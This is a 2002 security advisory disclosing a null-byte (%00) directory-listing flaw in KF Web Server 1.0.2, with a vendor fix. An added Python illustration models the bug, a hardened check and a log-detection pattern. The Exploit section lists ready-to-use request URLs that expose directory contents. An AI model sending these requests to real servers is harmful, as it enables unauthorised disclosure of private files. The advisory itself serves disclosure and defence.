Reporter Arnaud Jacques
KF Web Server version 1.0.2 shows file and directory content
.oO Overview Oo.
KF Web Server version 1.0.2 shows file and directory content
Discovered on July 2nd, 2002
Vendor: KeyFocus (http://www.keyfocus.net/kfws/)
KF Web Server 1.0.2 is a free personal web server available for Windows
98, ME, 2000 and XP. This web server can be made to show file and directory content.
.oO Details Oo.
If the requested URL contains a %00 after a directory name, the server
lists all files in that directory.
A hacker can see all hidden (non-HTML linked) files and directories on the
.oO Exploit Oo.
The exploit is really easy. You can do it with any browser.
http://server_name/index.html : Normal use.
http://server_name/%00 : You get the vulnerability.
http://server_name/index.html%00 : Is *not* vulnerable.
http://server_name/%00index.html : You get the vulnerability. In fact
everything after %00 is ignored.
http://server_name/subdir/%00 : You get the vulnerability.
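The following Python is an added illustration, not code from the advisory or from KeyFocus. It models the behaviour described above (the decoded path is cut off at the first NUL byte, so a %00 after a directory name leaves a bare directory path behind), shows the input validation a server should apply instead (reject any request whose decoded path contains NUL), and scans a few constructed access-log lines for this request pattern. The "C-style truncation" model of the server and the log format are assumptions; the sample paths are the ones listed in the Exploit section.

```python
import re
from urllib.parse import unquote

# The request paths from the advisory's Exploit section (host part stripped).
SAMPLE_PATHS = [
    "/index.html",      # normal use
    "/%00",             # listing of the document root
    "/index.html%00",   # not vulnerable: %00 follows a file name, not a directory
    "/%00index.html",   # everything after %00 is ignored -> root listing
    "/subdir/%00",      # listing of subdir
]


def naive_truncated_path(raw_path: str) -> str:
    """Model of the vulnerable behaviour (assumption: the server percent-decodes
    the path and then treats the first NUL as the end of the string, C-style).
    Returns the path the file handler effectively sees."""
    decoded = unquote(raw_path)
    nul = decoded.find("\x00")
    return decoded if nul < 0 else decoded[:nul]


def hardened_path(raw_path: str):
    """Defensive check: decode the path and refuse any request whose decoded form
    contains a NUL byte, so no later string handling can truncate it.
    Returns the decoded path, or None when the request should get a 400."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        return None
    return decoded


def classify(raw_path: str) -> dict:
    """Summarise what the vulnerable server and the hardened check each do."""
    effective = naive_truncated_path(raw_path)
    return {
        "effective_path": effective,
        # A truncated path ending in "/" names a directory, hence a listing.
        "would_list_directory": effective.endswith("/"),
        "accepted_by_hardened_check": hardened_path(raw_path) is not None,
    }


# Constructed access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jul/2002:10:00:01 +0200] "GET /index.html HTTP/1.0" 200 1234',
    '10.0.0.5 - - [02/Jul/2002:10:00:02 +0200] "GET /%00 HTTP/1.0" 200 5678',
    '10.0.0.5 - - [02/Jul/2002:10:00:03 +0200] "GET /subdir/%00 HTTP/1.0" 200 910',
    '10.0.0.5 - - [02/Jul/2002:10:00:04 +0200] "GET /%00index.html HTTP/1.0" 200 5678',
]

REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/')


def find_null_byte_requests(log_lines):
    """Return the log lines whose request target decodes to contain a NUL byte.
    Note: a single decoding pass is applied; double-encoded forms such as %2500
    decode to the literal text '%00' and are not flagged here."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if m and "\x00" in unquote(m.group(1)):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, classify(p))
    print(f"{len(find_null_byte_requests(SAMPLE_LOG))} suspicious request(s) in sample log")
```

Running the script reproduces the advisory's table: `/%00`, `/%00index.html` and `/subdir/%00` collapse to a directory path and would produce a listing, `/index.html%00` collapses to the file name and does not, and the hardened check rejects all four %00 variants while accepting `/index.html`.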
.oO Solution Oo.
The vendor has been informed and has solved the problem.
Upgrade to KF Web Server version 1.0.3.
.oO Discovered by Oo.
Arnaud Jacques aka scrap